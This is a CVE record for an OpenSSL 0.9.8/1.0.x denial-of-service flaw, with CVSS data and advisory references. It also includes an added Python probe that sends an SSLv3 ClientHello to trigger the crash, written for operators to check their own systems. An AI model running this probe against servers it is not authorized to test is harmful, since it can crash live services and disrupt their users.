ID CVE-2014-3569
Summary The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix. CWE-476: NULL Pointer Dereference (http://cwe.mitre.org/data/definitions/476.html)
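The trigger named in the summary is an SSLv3 ClientHello sent to a server that does not support SSLv3. The probe below reproduces that condition so an operator can check a test system before and after patching. It is an added example, not code from the CVE record, the referenced advisories or OpenSSL itself; the record layout follows the SSLv3 wire format, while the cipher-suite list, the fixed client random and the response labels are assumptions chosen for illustration.

```python
"""Probe for the CVE-2014-3569 trigger: an SSLv3 ClientHello to a no-ssl3 server.

Added example (not from the CVE record or OpenSSL). Run only against systems
you are authorized to test: a vulnerable daemon may crash on this handshake.
"""
import socket
import struct

SSL3_VERSION = 0x0300          # SSLv3 on the wire is major 3, minor 0
CONTENT_ALERT = 21
CONTENT_HANDSHAKE = 22
HANDSHAKE_CLIENT_HELLO = 1
HANDSHAKE_SERVER_HELLO = 2

# Assumed cipher suites: AES128-SHA, DES-CBC3-SHA, AES256-SHA. Any SSLv3-era
# suites work; the server's answer to the *version* is what we are testing.
DEFAULT_SUITES = (0x002F, 0x000A, 0x0035)


def build_sslv3_client_hello(cipher_suites=DEFAULT_SUITES, client_random=b"\x00" * 32):
    """Return one SSLv3 record carrying a minimal ClientHello (no extensions)."""
    suites = b"".join(struct.pack("!H", cs) for cs in cipher_suites)
    body = (
        struct.pack("!H", SSL3_VERSION)        # client_version = 3.0
        + client_random                        # 32 bytes, fixed here for determinism
        + b"\x00"                              # session_id length 0
        + struct.pack("!H", len(suites)) + suites
        + b"\x01\x00"                          # one compression method: null
    )
    handshake = bytes([HANDSHAKE_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BHH", CONTENT_HANDSHAKE, SSL3_VERSION, len(handshake)) + handshake


def classify_response(data):
    """Label what the server sent back; b'' means EOF or reset with no alert."""
    if not data:
        # Ambiguous: an orderly close without an alert, or the crash this CVE
        # describes. The caller must confirm by checking the daemon is still up.
        return "closed-without-alert"
    if len(data) < 5:
        return "malformed"
    ctype, _version, _length = struct.unpack("!BHH", data[:5])
    if ctype == CONTENT_ALERT and len(data) >= 7:
        level, desc = data[5], data[6]      # e.g. 2:70 protocol_version
        return f"alert:{level}:{desc}"
    if ctype == CONTENT_HANDSHAKE and len(data) >= 6 and data[5] == HANDSHAKE_SERVER_HELLO:
        return "sslv3-accepted"             # SSLv3 is enabled: a separate finding
    return "other"


def probe(host, port, timeout=5.0):
    """Send the SSLv3 ClientHello, classify the reply, then re-check the listener."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_sslv3_client_hello())
        try:
            data = s.recv(4096)
        except (ConnectionResetError, socket.timeout):
            data = b""
    verdict = classify_response(data)
    # Second connect distinguishes "handled and closed" from "daemon gone".
    try:
        socket.create_connection((host, port), timeout=timeout).close()
        still_listening = True
    except OSError:
        still_listening = False
    return verdict, still_listening


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], int(sys.argv[2])))
```

A result of `("closed-without-alert", False)` is consistent with the crash described above; `("closed-without-alert", True)` or an `alert:` label means the server rejected SSLv3 without falling over. Servers that fork a child per connection can lose the child and keep listening, so on those the second connect is not conclusive on its own; check the service's own logs for the crash.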
References
Vulnerable Configurations
  • cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*
CVSS
Base: 5.0 (as of 15-11-2017 - 02:29)
Impact: 2.9
Exploitability: 10.0
CWE NVD-CWE-Other
CAPEC
Access
  • Vector: NETWORK
  • Complexity: LOW
  • Authentication: NONE
Impact
  • Confidentiality: NONE
  • Integrity: NONE
  • Availability: PARTIAL
cvss-vector via4 AV:N/AC:L/Au:N/C:N/I:N/A:P
refmap via4
apple APPLE-SA-2015-04-08-2
bid 71934
cisco 20150310 Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products
confirm
debian DSA-3125
hp
  • HPSBHF03289
  • HPSBMU03380
  • HPSBMU03396
  • HPSBMU03397
  • HPSBMU03409
  • HPSBMU03413
  • HPSBOV03318
  • HPSBUX03162
  • HPSBUX03244
  • SSRT101885
mandriva
  • MDVSA-2015:019
  • MDVSA-2015:062
sectrack 1033378
suse
  • SUSE-SU-2015:0946
  • openSUSE-SU-2015:0130
  • openSUSE-SU-2016:0640
Last major update 15-11-2017 - 02:29
Published 24-12-2014 - 11:59
Last modified 15-11-2017 - 02:29